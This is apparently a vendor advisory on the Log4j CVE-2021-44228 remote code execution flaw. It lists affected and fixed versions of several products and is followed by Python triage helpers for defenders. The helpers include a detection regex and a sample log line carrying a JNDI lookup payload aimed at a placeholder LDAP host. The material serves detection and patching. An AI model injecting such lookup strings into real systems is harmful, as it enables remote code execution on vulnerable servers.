The Log4j team has been made aware of a security vulnerability, CVE-2021-44228, that has been addressed in Log4j 2.12.2 and Log4j 2.16.0.
Log4j’s JNDI support did not restrict which names could be resolved. Some protocols are unsafe or can allow remote code execution.
One vector that exposed this vulnerability was Log4j’s allowance of Lookups to appear in log messages. This meant that when user input was logged, and that user input contained a JNDI Lookup pointing to a malicious server, Log4j would resolve that JNDI Lookup, connect to that server, and potentially download serialized Java code from that remote server. That code could in turn execute during deserialization. This is known as an RCE (Remote Code Execution) attack.
MicroFocus Application Lifecycle Management (ALM)
15.5.0 and later
Fix applied 12/18/2021
4.4.1 and earlier
Hotfix available for:
HF8 Fix applied 01/10/2022
19.4.0 and later
Fixed Tasktop versions:
Note: This fix will be applied to all Tasktop versions later than the versions listed above.
10.5.3 and earlier
JVM option: -Dlog4j2.formatMsgNoLookups=true
qTest Patch should be available on 12/20
Elasticsearch Fix applied 12/18/2021
Elasticsearch Fix: https://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476
qTest 10.5.3 and earlier include a version of the Elasticsearch REST client (7.6.2) libraries that contain the log4j vulnerability.
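Added triage helpers (example code written for this page, not from Apache, Tricentis or any vendor listed above) covering the vulnerability description at the top and the JVM-option mitigation in the table: they classify a log4j-core version against the fix versions the advisory names (2.12.2 and 2.16.0), flag logged input carrying a JNDI Lookup string, and check a JVM argument list for -Dlog4j2.formatMsgNoLookups=true. The version strings, JVM arguments and log lines are constructed samples.

```python
"""Defender-side triage helpers for CVE-2021-44228 (added example).
Fix versions are taken from the advisory text above; sample inputs are constructed."""
import re

FIXED_2_12 = (2, 12, 2)   # fix on the 2.12 maintenance branch
FIXED_2_16 = (2, 16, 0)   # fix on the main 2.x line

def parse_version(s):
    """'2.14.1' -> (2, 14, 1); qualifiers such as '-rc1' are dropped."""
    m = re.match(r"^(\d+)\.(\d+)(?:\.(\d+))?", s.strip())
    if not m:
        raise ValueError(f"unrecognised log4j version: {s!r}")
    return int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)

def log4j2_core_vulnerable(version):
    """True if a log4j-core 2.x version predates the advisory's fix versions,
    False if it carries a fix, None for non-2.x versions (outside this CVE)."""
    v = parse_version(version)
    if v[0] != 2:
        return None
    if v[:2] == (2, 12):          # 2.12.x is fixed from 2.12.2 onwards
        return v < FIXED_2_12
    return v < FIXED_2_16         # every other 2.x line needs 2.16.0

# The input pattern the advisory says Log4j would resolve: a JNDI Lookup.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

def find_jndi_lookups(log_lines):
    """Return (line_no, line) for each log line containing a JNDI Lookup string."""
    return [(i, line) for i, line in enumerate(log_lines, 1) if JNDI_LOOKUP.search(line)]

def lookups_disabled(jvm_args):
    """True if the JVM argument list carries the mitigation flag from the table."""
    return any(a.strip().lower() == "-dlog4j2.formatmsgnolookups=true" for a in jvm_args)

# Constructed samples: a benign request line and one carrying a lookup string.
SAMPLE_LOG = [
    "2021-12-10 12:00:01 INFO  request ua=Mozilla/5.0 path=/login",
    "2021-12-10 12:00:02 INFO  request ua=${jndi:ldap://example.invalid/x} path=/login",
]
SAMPLE_JVM_ARGS = ["-Xmx2g", "-Dlog4j2.formatMsgNoLookups=true"]

if __name__ == "__main__":
    for ver in ("2.14.1", "2.12.2", "2.15.0", "2.16.0", "1.2.17"):
        print(ver, log4j2_core_vulnerable(ver))
    print(find_jndi_lookups(SAMPLE_LOG))
    print(lookups_disabled(SAMPLE_JVM_ARGS))
```

The version check only reflects the two fix versions this advisory states; consult the vendor rows above for product-level patch status.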